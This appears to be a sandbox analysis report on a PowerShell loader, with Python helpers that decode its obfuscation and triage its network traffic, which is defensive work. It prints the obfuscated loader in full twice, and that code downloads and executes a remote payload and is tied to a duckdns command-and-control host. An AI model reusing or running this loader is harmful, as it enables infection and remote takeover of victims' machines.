PID 1816 wrote to memory of 4204 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1816 wrote to memory of 4204 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4204 wrote to memory of 2308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 2308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 4204 wrote to memory of 1844 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4204 wrote to memory of 1844 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4204 wrote to memory of 1844 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1844 wrote to memory of 2624 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1844 wrote to memory of 2624 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1844 wrote to memory of 2624 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1844 wrote to memory of 4896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1844 wrote to memory of 4896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1844 wrote to memory of 4896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1844 wrote to memory of 4896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1844 wrote to memory of 4896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953.cmd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Decisorens='Sub';$Decisorens+='strin';$Pissoirets = 1;$Decisorens+='g';Function Ovibovinae($Gtteris){$brsflsomme=$Gtteris.Length-$Pissoirets;For($Ssttes89=5;$Ssttes89 -lt $brsflsomme;$Ssttes89+=6){$tored+=$Gtteris.$Decisorens.Invoke( $Ssttes89, $Pissoirets);}$tored;}function Siphoning($Moduler){ . ($Fratrdelsen) ($Moduler);}$topografs=Ovibovinae 'AmbulMSkunkoProvezUnb,niG,undlJimcrlPrrieaChoke/Rense5 Unde.Palp 0Ukonv Djede( R llWErhveiLrerinfluordK edio B,nswBloodsEri d ForbrN .tigT Clin Sand1Ekspa0Bandi.Presn0biogr;Indtg Tera,W VindiCheepn,eraa6 Dise4 pato;Masca RkenvxBende6,ymno4 nel;Brand Kolonr.onulv.eget:Reack1Alons2 lagl1Wen,h. eyed0Isklu) Efte Bere.Gf oebe LatecBa,isks,ndhoAmico/Sekst2 P ug0Go,er1Unhab0Ja id0godhj1Mando0l.bor1Repla SchweFJordliSp dsrYe peest,fff Esdro,eavexDispo/Cykel1.ngos2.belt1Diath.Stted0p,ece ';$Lettroenheds=Ovibovinae 'BrestUAfgnisGarroe Spr,rSyd,o-DiestAR.pargF.ldme Udd,nRivert Amir ';$Ciboney=Ovibovinae 'Fjerbh Hygrt MedltHyld p InvasSemid:Urano/Mel b/Prea.wCi,taw In,awSemin.Lith.sForlge sepanFremldSports Akkopb,spaaNyderc Pretedenia. 
YankcMastioEndosmSelen/StorhpBluntrChaulomo st/UdgradParcelUnvar/IntenhGopledBeetra Em.e6Afl,dmAfdelgEpaen ';$Transporterings7=Ovibovinae 'Ankri>resfo ';$Fratrdelsen=Ovibovinae 'Imprei KommeOilstxDomi, ';$Bivirknings='Unionizing';$septodiarrhea = Ovibovinae ' Socie St,tcHelheh TredoCathe Afsla%K.skvaReefypHensipLaserdBldkoaUntretJin la Mega% Unim\UnvioA,ecrinturaceH vedmCallgoDummetJas iavejf.x DidyiSenils Skif.D.ttoS Frgea,kravfWalin fanta&Henot&Overb AntiweS,attc Incrh ironoBramb nchatBrint ';Siphoning (Ovibovinae 'Ska,b$,laapgMin rl S.lfoVandfbUnipoaSljdll un r:RdninFFormaoOrigirRe,egeCardis MurktAccupa KidnaUo mreMagelnFortad AtheeRuddo=Redis(SammecVe.dem Fis dMarty Hogti/Ransac nmag ,irma$Ove.lsObjeceStirpp BegrtSphenoAfso dFortriSaarfa,lbumrtalr rN,nvohDermieAditsaUnsal)Kol.e ');Siphoning (Ovibovinae ' Unre$Baxiegl,ndslFras.o enfibDeltaaDilutlOrnit:Nonhyt ExamaTranssHydr kVetoweSongbn.triksFe.edpBegitiVanddlSk.lnlOvereeFaculrVskete emor=Polit$ ,ivsCFrikiiKl.rgbEffekoTapionDysm,eSolblySm tt.KarelsTetrapTeg.tlStathiVievatScape( Sang$ UnclTRemitrBeskya s linApatisUnadvp Fa roReblarIso,atPersoeMelderLin.iiInedunpoleagNe.rus pr.d7Forva)tr st ');$Ciboney=$taskenspillere[0];$Vornedskabs= (Ovibovinae 'Inter$SubjegKomprlF,rmio SambbBla.kaVig.ilbrinv:ForhaAIch ebSkaldoTrilom AfskaDelaysDesoruSta.isFilet=Ed,erNVersee YndewCross-DozerOStorkbDandajHourle TermcUmp.ntStrik PolyS Kdvayhightsprogrt T,bee Syntm Modt.Vrt,nNsubskeTalmut Armi.An geW P,ateOrmu.bH.adcCSh.velFacepidemiueFolkenFejlgt');$Vornedskabs+=$Forestaaende[1];Siphoning ($Vornedskabs);Siphoning (Ovibovinae '.ngan$BomulA DodgbInteroUnrecm.kovfaKontisCa hau MonisSkarn.MajdaH.aneleretolaTeknodFort,e Udr.r RittsReima[Senio$L,ladLGenskeUbehjtF otytLxxcorSnvleoFraade,ealin spash.orblehapted K.nesSule.]Sk.ed=Eri k$ Tr.et Ca,co azerpSulteo UnchgCarserEkphoaThybofKom,usgudhj ');$Rastedes=Ovibovinae ' ,tat$TabirA OplybTillgo VeksmB.gnia ustis SeptuNedslsBortf.SkinpDF rwao Aftaw.adionAera lN,lgnoThwaraMotocdGlaucF 
HostiDukkelHulake aner(Aarsr$,aimoCmaaleiBilbob PretoMotornShrineProtyyCompa, Rets$Et,peBkdgryeG,nnea Obdut Nonti U,rifSkippiBl msc,unnaaDescrl De.i) P,ec ';$Beatifical=$Forestaaende[0];Siphoning (Ovibovinae 'Nahum$ SiskgMu.til E gloF.ldkbMisanaTiltrlbohun:Po itkle.hal ,undaCr nipWelshp,lgaaeSkule=Kunde(TokobTHvileeStibisImplit Ynke-Sm ltPTelefa,nsvatNatdrhUdsto verbi$Res rBHun,eeDre.eaUnr,atYamskiStvb,fTermiiMisfacHitchaso tsl Un.o) Anti ');while (!$klappe) {Siphoning (Ovibovinae 'As,en$halshgGiobelMagmaoast,obAspidaUltralIndef: amilI He sn Pinel GidsaKransk Slu eAerob=Dec.m$H,ddottils rS,agsuMokkaeUns i ') ;Siphoning $Rastedes;Siphoning (Ovibovinae ' DaemSPlkimtkraniaUdsmyrUp,aktPitho-MankeSBundfl,remae DipleDisc.p Whit Dor.4Mejse ');Siphoning (Ovibovinae 'Yar e$,ikspgBugollCuamuo EmnebWurz atoaarll.veb: orskkSnydelNedkma SonipHellep skileRhabd= Unpr( Rap.TBaluse iessErnr,tFirea-InterPTransaMaveptSpecih Orig Erken$SuperB.tande.ltinaBetlet Ik di in.sfLutrii IllucMacroaKonfelTi,ul)Bra,t ') ;Siphoning (Ovibovinae 'Trans$ Ra,ggBekral DekroMinerb Sen,a,eduplRabb,:PohnaTCogitrAnd.saDragsk perstGeneraLikeltri,lebparmorT,rsku FotodAttendMonoceAfstit NordsDeca =A tor$ symmgOmo hlFangeoRundsbDoddyaDikotlellip:BoombTCerasyTendidBuffie ScrulOutjeiFan ag ennehGoddaeW xesd KontsAflur6Psyki0Att i+Tata,+grape%Drkl $ afvit Gudsa iurs KrigkSakkaeIndben N nms Forgp ,alei,vindl EpidlK afte uperAchroePorta. 
BlomcDagsmoStordu Svernhu,outConco ') ;$Ciboney=$taskenspillere[$Traktatbruddets];}$Besvangrings=327350;$Magnetizes=29673;Siphoning (Ovibovinae 'Himme$LeucogDist.l Vi ioMusm bS peraAnti.lIncon:Befu,F ,andoover,r klipmUregeeCannulNebuleTomatn,rder Tarms=Gangl ExxheGProgrealbyltHemme-egundC,roteoStor,nNonlotprogreRullenShm,otfrdse Agnus$JambkB Snige Ticta SkjotModuliEfterf DandiSke.tc Exena FlyvlForre ');Siphoning (Ovibovinae 'Gensk$ ogedgInappl f.looMorinbFiguragramml.hanc:AesthCSvirroElektn dkoms,nremtSga.er l moaAntiaiAf,enn AfteiFunktnSjakfgGawkylO.kldybonde Kinet=Chanc Photo[,onreS Semiy M,thsflamitPorceeYodelmMaske. eepyCOmstnoKamm.nSaxicv IsobePalmirstilltHydro]Ddssy:elekt:BeltwFResperSpil.o,edfim Wi,dB Vi raU opys SlakeSrgem6.oney4Com.lS GothtSadomrRajahiCantonOversgRegul(Be er$VbnerFDioxio.piscrimpasmT,llgeUn.erlSa.sgeVand nGirob)Allic ');Siphoning (Ovibovinae 'Unwar$ChampgNonhelBowleoE dosb R tea U.islInven:ApperAS,elluVedlgtSavleo Omdiv Ple.a Karts.entekTripteungesaGa ann iorglPe,sagRicingStense,erbotMitzy F.ys= .los Kandi[StumoSIngeryYndigsBeregtBiloceafi nmNonob. PensTUskyleEurokx Zaddtforbl.BosweE ewhnNoncoc PropoUnmasdGe,nei FisknRe,izg Outs]Presc:Skovb:RathaALandlS FratC AngeIMonodIFradr.SkoleGRemudeHy,hetYummiS Untht AsylrUna,iiUndernKak.fg frem( Unst$K,hytCTr,teoHelmenPli,tsFrerbtAtt,irChloraepephiFuturn Har iSceptnSuperg BrislSkrifyT lin)Tengu ');Siphoning (Ovibovinae 'Discu$HeavegChaldl.igtso Ove,bKonseaHovmolValed:UdbanBWild,o,ffenoMatarzEarspetruncrSa,nt=Tuber$ TeleAPa.dauyirtht mancoFoothvKingfaDri ks SeggkDreameRaadgaStempnAn ecl Kna.gObersg Tik eSognet ditt. AalesTorifuArboubPodagsFlanntNonidrA,achimis tnGalgagKludr(Nonne$baadeBSupraeb.sots.komavBrostaA.rennEnestg Duh r DistikogepnSpringLoatus Faru,Repo $TekstMMartha AmphgP ussntricaef,edst.alskiA,trkzSkattemelansAscog).iana ');Siphoning $Boozer;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Anemotaxis.Saf && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Decisorens='Sub';$Decisorens+='strin';$Pissoirets = 1;$Decisorens+='g';Function Ovibovinae($Gtteris){$brsflsomme=$Gtteris.Length-$Pissoirets;For($Ssttes89=5;$Ssttes89 -lt $brsflsomme;$Ssttes89+=6){$tored+=$Gtteris.$Decisorens.Invoke( $Ssttes89, $Pissoirets);}$tored;}function Siphoning($Moduler){ . ($Fratrdelsen) ($Moduler);}$topografs=Ovibovinae 'AmbulMSkunkoProvezUnb,niG,undlJimcrlPrrieaChoke/Rense5 Unde.Palp 0Ukonv Djede( R llWErhveiLrerinfluordK edio B,nswBloodsEri d ForbrN .tigT Clin Sand1Ekspa0Bandi.Presn0biogr;Indtg Tera,W VindiCheepn,eraa6 Dise4 pato;Masca RkenvxBende6,ymno4 nel;Brand Kolonr.onulv.eget:Reack1Alons2 lagl1Wen,h. eyed0Isklu) Efte Bere.Gf oebe LatecBa,isks,ndhoAmico/Sekst2 P ug0Go,er1Unhab0Ja id0godhj1Mando0l.bor1Repla SchweFJordliSp dsrYe peest,fff Esdro,eavexDispo/Cykel1.ngos2.belt1Diath.Stted0p,ece ';$Lettroenheds=Ovibovinae 'BrestUAfgnisGarroe Spr,rSyd,o-DiestAR.pargF.ldme Udd,nRivert Amir ';$Ciboney=Ovibovinae 'Fjerbh Hygrt MedltHyld p InvasSemid:Urano/Mel b/Prea.wCi,taw In,awSemin.Lith.sForlge sepanFremldSports Akkopb,spaaNyderc Pretedenia. YankcMastioEndosmSelen/StorhpBluntrChaulomo st/UdgradParcelUnvar/IntenhGopledBeetra Em.e6Afl,dmAfdelgEpaen ';$Transporterings7=Ovibovinae 'Ankri>resfo ';$Fratrdelsen=Ovibovinae 'Imprei KommeOilstxDomi, ';$Bivirknings='Unionizing';$septodiarrhea = Ovibovinae ' Socie St,tcHelheh TredoCathe Afsla%K.skvaReefypHensipLaserdBldkoaUntretJin la Mega% Unim\UnvioA,ecrinturaceH vedmCallgoDummetJas iavejf.x DidyiSenils Skif.D.ttoS Frgea,kravfWalin fanta&Henot&Overb AntiweS,attc Incrh ironoBramb nchatBrint ';Siphoning (Ovibovinae 'Ska,b$,laapgMin rl S.lfoVandfbUnipoaSljdll un r:RdninFFormaoOrigirRe,egeCardis MurktAccupa KidnaUo mreMagelnFortad AtheeRuddo=Redis(SammecVe.dem Fis dMarty Hogti/Ransac nmag ,irma$Ove.lsObjeceStirpp BegrtSphenoAfso dFortriSaarfa,lbumrtalr rN,nvohDermieAditsaUnsal)Kol.e ');Siphoning (Ovibovinae ' Unre$Baxiegl,ndslFras.o enfibDeltaaDilutlOrnit:Nonhyt ExamaTranssHydr kVetoweSongbn.triksFe.edpBegitiVanddlSk.lnlOvereeFaculrVskete emor=Polit$ ,ivsCFrikiiKl.rgbEffekoTapionDysm,eSolblySm tt.KarelsTetrapTeg.tlStathiVievatScape( Sang$ UnclTRemitrBeskya s linApatisUnadvp Fa roReblarIso,atPersoeMelderLin.iiInedunpoleagNe.rus pr.d7Forva)tr st ');$Ciboney=$taskenspillere[0];$Vornedskabs= (Ovibovinae 'Inter$SubjegKomprlF,rmio SambbBla.kaVig.ilbrinv:ForhaAIch ebSkaldoTrilom AfskaDelaysDesoruSta.isFilet=Ed,erNVersee YndewCross-DozerOStorkbDandajHourle TermcUmp.ntStrik PolyS Kdvayhightsprogrt T,bee Syntm Modt.Vrt,nNsubskeTalmut Armi.An geW P,ateOrmu.bH.adcCSh.velFacepidemiueFolkenFejlgt');$Vornedskabs+=$Forestaaende[1];Siphoning ($Vornedskabs);Siphoning (Ovibovinae '.ngan$BomulA DodgbInteroUnrecm.kovfaKontisCa hau MonisSkarn.MajdaH.aneleretolaTeknodFort,e Udr.r RittsReima[Senio$L,ladLGenskeUbehjtF otytLxxcorSnvleoFraade,ealin spash.orblehapted K.nesSule.]Sk.ed=Eri k$ Tr.et Ca,co azerpSulteo UnchgCarserEkphoaThybofKom,usgudhj ');$Rastedes=Ovibovinae ' ,tat$TabirA OplybTillgo VeksmB.gnia ustis SeptuNedslsBortf.SkinpDF rwao Aftaw.adionAera lN,lgnoThwaraMotocdGlaucF HostiDukkelHulake aner(Aarsr$,aimoCmaaleiBilbob PretoMotornShrineProtyyCompa, Rets$Et,peBkdgryeG,nnea Obdut Nonti U,rifSkippiBl msc,unnaaDescrl De.i) P,ec ';$Beatifical=$Forestaaende[0];Siphoning (Ovibovinae 'Nahum$ SiskgMu.til E gloF.ldkbMisanaTiltrlbohun:Po itkle.hal ,undaCr nipWelshp,lgaaeSkule=Kunde(TokobTHvileeStibisImplit Ynke-Sm ltPTelefa,nsvatNatdrhUdsto verbi$Res rBHun,eeDre.eaUnr,atYamskiStvb,fTermiiMisfacHitchaso tsl Un.o) Anti ');while (!$klappe) {Siphoning (Ovibovinae 'As,en$halshgGiobelMagmaoast,obAspidaUltralIndef: amilI He sn Pinel GidsaKransk Slu eAerob=Dec.m$H,ddottils rS,agsuMokkaeUns i ') ;Siphoning $Rastedes;Siphoning (Ovibovinae ' DaemSPlkimtkraniaUdsmyrUp,aktPitho-MankeSBundfl,remae DipleDisc.p Whit Dor.4Mejse ');Siphoning (Ovibovinae 'Yar e$,ikspgBugollCuamuo EmnebWurz atoaarll.veb: orskkSnydelNedkma SonipHellep skileRhabd= Unpr( Rap.TBaluse iessErnr,tFirea-InterPTransaMaveptSpecih Orig Erken$SuperB.tande.ltinaBetlet Ik di in.sfLutrii IllucMacroaKonfelTi,ul)Bra,t ') ;Siphoning (Ovibovinae 'Trans$ Ra,ggBekral DekroMinerb Sen,a,eduplRabb,:PohnaTCogitrAnd.saDragsk perstGeneraLikeltri,lebparmorT,rsku FotodAttendMonoceAfstit NordsDeca =A tor$ symmgOmo hlFangeoRundsbDoddyaDikotlellip:BoombTCerasyTendidBuffie ScrulOutjeiFan ag ennehGoddaeW xesd KontsAflur6Psyki0Att i+Tata,+grape%Drkl $ afvit Gudsa iurs KrigkSakkaeIndben N nms Forgp ,alei,vindl EpidlK afte uperAchroePorta. BlomcDagsmoStordu Svernhu,outConco ') ;$Ciboney=$taskenspillere[$Traktatbruddets];}$Besvangrings=327350;$Magnetizes=29673;Siphoning (Ovibovinae 'Himme$LeucogDist.l Vi ioMusm bS peraAnti.lIncon:Befu,F ,andoover,r klipmUregeeCannulNebuleTomatn,rder Tarms=Gangl ExxheGProgrealbyltHemme-egundC,roteoStor,nNonlotprogreRullenShm,otfrdse Agnus$JambkB Snige Ticta SkjotModuliEfterf DandiSke.tc Exena FlyvlForre ');Siphoning (Ovibovinae 'Gensk$ ogedgInappl f.looMorinbFiguragramml.hanc:AesthCSvirroElektn dkoms,nremtSga.er l moaAntiaiAf,enn AfteiFunktnSjakfgGawkylO.kldybonde Kinet=Chanc Photo[,onreS Semiy M,thsflamitPorceeYodelmMaske. eepyCOmstnoKamm.nSaxicv IsobePalmirstilltHydro]Ddssy:elekt:BeltwFResperSpil.o,edfim Wi,dB Vi raU opys SlakeSrgem6.oney4Com.lS GothtSadomrRajahiCantonOversgRegul(Be er$VbnerFDioxio.piscrimpasmT,llgeUn.erlSa.sgeVand nGirob)Allic ');Siphoning (Ovibovinae 'Unwar$ChampgNonhelBowleoE dosb R tea U.islInven:ApperAS,elluVedlgtSavleo Omdiv Ple.a Karts.entekTripteungesaGa ann iorglPe,sagRicingStense,erbotMitzy F.ys= .los Kandi[StumoSIngeryYndigsBeregtBiloceafi nmNonob. PensTUskyleEurokx Zaddtforbl.BosweE ewhnNoncoc PropoUnmasdGe,nei FisknRe,izg Outs]Presc:Skovb:RathaALandlS FratC AngeIMonodIFradr.SkoleGRemudeHy,hetYummiS Untht AsylrUna,iiUndernKak.fg frem( Unst$K,hytCTr,teoHelmenPli,tsFrerbtAtt,irChloraepephiFuturn Har iSceptnSuperg BrislSkrifyT lin)Tengu ');Siphoning (Ovibovinae 'Discu$HeavegChaldl.igtso Ove,bKonseaHovmolValed:UdbanBWild,o,ffenoMatarzEarspetruncrSa,nt=Tuber$ TeleAPa.dauyirtht mancoFoothvKingfaDri ks SeggkDreameRaadgaStempnAn ecl Kna.gObersg Tik eSognet ditt. AalesTorifuArboubPodagsFlanntNonidrA,achimis tnGalgagKludr(Nonne$baadeBSupraeb.sots.komavBrostaA.rennEnestg Duh r DistikogepnSpringLoatus Faru,Repo $TekstMMartha AmphgP ussntricaef,edst.alskiA,trkzSkattemelansAscog).iana ');Siphoning $Boozer;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Anemotaxis.Saf && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"
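
The powershell.exe command lines above are obfuscated the way this loader family usually is: every string literal is passed through Ovibovinae, which keeps only the character at index 5, 11, 17, ... (Substring($i, 1) with a stride of 6, stopping one short of the end) and throws the rest away, and Siphoning dot-sources $Fratrdelsen on the decoded text. The Python below is an added example, not code from the report or from the sample; it reimplements that routine and runs it over four assignments copied verbatim from the command line. The helper names (decode_literal, decode_script) are mine, and the start/stride parameters are an assumption made so the same function can be pointed at other builds of the loader, which shift those values.

```python
from __future__ import annotations

import re

# The sample builds $Decisorens = 'Sub' + 'strin' + 'g' ('Substring'), sets $Pissoirets = 1
# and defines Ovibovinae() as:
#   $end = $s.Length - 1
#   for ($i = 5; $i -lt $end; $i += 6) { $out += $s.Substring($i, 1) }
# so the real text of each literal is the character at index 5, 11, 17, ... and the other
# five characters of every six (plus the trailing space) are filler.


def decode_literal(literal: str, start: int = 5, stride: int = 6) -> str:
    """Python equivalent of Ovibovinae(). start/stride default to this sample's values;
    making them parameters is an assumption (other builds of the loader shift them)."""
    return literal[start:len(literal) - 1:stride]


# Matches "$Name=Ovibovinae '...'" as well as "(Ovibovinae '...')". PowerShell single-quoted
# strings have no escapes other than a doubled quote, and none occur in this script, so a
# plain [^']* body is enough.
LITERAL_RE = re.compile(r"(?:\$(\w+)\s*=\s*)?Ovibovinae\s+'([^']*)'")


def decode_script(script: str) -> list[tuple[str | None, str]]:
    """Return (assigned variable name or None, decoded text) for each literal, in script order."""
    return [(m.group(1), decode_literal(m.group(2))) for m in LITERAL_RE.finditer(script)]


# Four assignments copied verbatim from the powershell.exe command line in this report.
SAMPLE_SCRIPT = (
    "$Lettroenheds=Ovibovinae 'BrestUAfgnisGarroe Spr,rSyd,o-DiestAR.pargF.ldme Udd,nRivert Amir ';"
    "$Ciboney=Ovibovinae 'Fjerbh Hygrt MedltHyld p InvasSemid:Urano/Mel b/Prea.wCi,taw In,aw"
    "Semin.Lith.sForlge sepanFremldSports Akkopb,spaaNyderc Pretedenia. YankcMastioEndosmSelen/"
    "StorhpBluntrChaulomo st/UdgradParcelUnvar/IntenhGopledBeetra Em.e6Afl,dmAfdelgEpaen ';"
    "$Transporterings7=Ovibovinae 'Ankri>resfo ';"
    "$Fratrdelsen=Ovibovinae 'Imprei KommeOilstxDomi, ';"
)

if __name__ == "__main__":
    for name, text in decode_script(SAMPLE_SCRIPT):
        print(f"${name or '?'} = {text!r}")
```

Run as-is it prints $Lettroenheds = 'User-Agent', $Ciboney = 'https://www.sendspace.com/pro/dl/hda6mg' (the first-stage download, which is what the sendspace rows in the Network section below are), $Transporterings7 = '>' and $Fratrdelsen = 'iex'. Because Siphoning() does `. ($Fratrdelsen) ($Moduler)`, every `Siphoning (Ovibovinae '...')` in the command line is an `iex` of the decoded text; swapping that alias for Write-Output in an isolated VM dumps the whole second layer without executing it. One caveat about decoding from this page rather than from the original .cmd: the report renders the command line with runs of spaces collapsed, so some literals here (the User-Agent string assigned to $topografs, for one) stop lining up after the first collapsed gap and come out garbled from that point on.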

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.sendspace.com udp
US 172.67.170.105:443 www.sendspace.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 fs12n4.sendspace.com udp
CA 69.31.136.53:443 fs12n4.sendspace.com tcp
US 8.8.8.8:53 crt.sectigo.com udp
US 104.18.38.233:80 crt.sectigo.com tcp
US 8.8.8.8:53 105.170.67.172.in-addr.arpa udp
US 8.8.8.8:53 53.136.31.69.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
CA 69.31.136.53:443 fs12n4.sendspace.com tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 25.14.97.104.in-addr.arpa udp
US 172.67.170.105:443 www.sendspace.com tcp
US 8.8.8.8:53 fs13n4.sendspace.com udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
CA 69.31.136.57:443 fs13n4.sendspace.com tcp
US 8.8.8.8:53 57.136.31.69.in-addr.arpa udp
US 8.8.8.8:53 xvern429.duckdns.org udp
US 12.202.180.134:8890 xvern429.duckdns.org tcp
US 8.8.8.8:53 134.180.202.12.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp
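
The Network table mixes the sample's own traffic with traffic the sandbox and the OS generate on their own: the in-addr.arpa rows are the sandbox's PTR lookups for every peer it sees, the bing.com and bing.net rows are Windows background activity, and crt.sectigo.com is the certificate-chain (AIA) fetch Windows issues during a TLS handshake. The Python below is an added example, not part of the report, that parses rows in the table's layout and separates the two. The noise suffixes, the dynamic-DNS suffixes and the "common ports" set are heuristics I am assuming, not facts from the report, and the rows embedded in the script are a subset copied from the table above.

```python
from __future__ import annotations

# Subset of rows copied from the Network table in this report (Country Destination Domain
# Proto); the two repeated rows are kept deliberately so the de-duplication is visible.
NETWORK_ROWS = """\
US 8.8.8.8:53 www.sendspace.com udp
US 172.67.170.105:443 www.sendspace.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 fs12n4.sendspace.com udp
CA 69.31.136.53:443 fs12n4.sendspace.com tcp
US 8.8.8.8:53 crt.sectigo.com udp
US 104.18.38.233:80 crt.sectigo.com tcp
NL 23.62.61.160:443 www.bing.com tcp
CA 69.31.136.53:443 fs12n4.sendspace.com tcp
US 8.8.8.8:53 fs13n4.sendspace.com udp
CA 69.31.136.57:443 fs13n4.sendspace.com tcp
US 8.8.8.8:53 xvern429.duckdns.org udp
US 12.202.180.134:8890 xvern429.duckdns.org tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
"""

# Heuristics (assumptions, not from the report): background traffic the sandbox and the OS
# generate by themselves, dynamic-DNS providers that RAT operators favour, and ports that are
# unremarkable on their own.
NOISE_SUFFIXES = (".in-addr.arpa", ".bing.com", ".bing.net", ".sectigo.com")
DYNDNS_SUFFIXES = (".duckdns.org", ".no-ip.org", ".ddns.net")
COMMON_PORTS = {80, 443}


def parse_rows(text: str) -> list[dict]:
    """Parse whitespace-separated rows in the report's Network table layout."""
    rows: list[dict] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # header or blank line
        country, dest, domain, proto = parts
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain.lower(), "proto": proto.lower()})
    return rows


def classify(row: dict) -> str:
    if row["domain"].endswith(NOISE_SUFFIXES):
        return "noise"      # sandbox PTR lookups, Bing telemetry, certificate-chain fetch
    if row["proto"] == "udp" and row["port"] == 53:
        return "resolved"   # DNS query: shows the sample asked for the name, nothing more
    if row["domain"].endswith(DYNDNS_SUFFIXES) or row["port"] not in COMMON_PORTS:
        return "c2"         # dynamic DNS and/or an unusual port: the RAT callback
    return "download"       # any other TCP session: payload staging (sendspace here)


def triage(text: str) -> dict[str, list[tuple[str, str, int]]]:
    """Bucket unique (domain, ip, port) triples by category, first-seen order preserved."""
    buckets: dict[str, dict[tuple[str, str, int], None]] = {
        "c2": {}, "download": {}, "resolved": {}, "noise": {}}
    for row in parse_rows(text):
        buckets[classify(row)].setdefault((row["domain"], row["ip"], row["port"]), None)
    return {name: list(keys) for name, keys in buckets.items()}


if __name__ == "__main__":
    for name, items in triage(NETWORK_ROWS).items():
        print(name)
        for domain, ip, port in items:
            print(f"  {domain:32} {ip}:{port}")
```

The only row that survives as C2 is 12.202.180.134:8890 under xvern429.duckdns.org, a DuckDNS name on a non-standard port, which is the shape of an AsyncRAT callback; the three sendspace hosts land in the download bucket as the payload stage, and the five repeated tse1.mm.bing.net rows collapse to one noise entry. Treat the in-addr.arpa rows as something the sandbox did, not the sample.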

Files

memory/4204-2-0x00007FFA4C3A3000-0x00007FFA4C3A5000-memory.dmp

memory/4204-8-0x0000020AF4260000-0x0000020AF4282000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4lquy30a.0m2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4204-13-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/4204-14-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

